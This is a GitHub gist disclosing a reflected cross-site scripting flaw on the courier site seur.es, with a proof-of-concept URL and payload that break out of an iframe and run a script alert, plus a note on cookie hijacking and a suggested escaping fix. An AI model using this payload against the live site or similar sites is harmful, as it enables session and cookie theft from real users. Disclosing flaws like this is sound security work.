Skip to content

Instantly share code, notes, and snippets.

@MiguelBel

MiguelBel/Seur.es

Last active August 29, 2015 14:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save MiguelBel/56c9d2d517e5df6d7204 to your computer and use it in GitHub Desktop.
Save MiguelBel/56c9d2d517e5df6d7204 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Seur.es
Bypass Google Chrome Auditor: No
Web: http://www.seur.es
Vulnerability: Reflected XSS
PoC (Proof of concept): http://www.seur.com/buscador.do?txtPalabra=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22xss%22%29;%3C/script%3E%3Cdiv%20id=%22mi
Attack Vector: "></iframe><script>alert("xss");</script><div id="mi
Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention.
Solution: Escape the special chars '';!--"<XSS>=&{()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment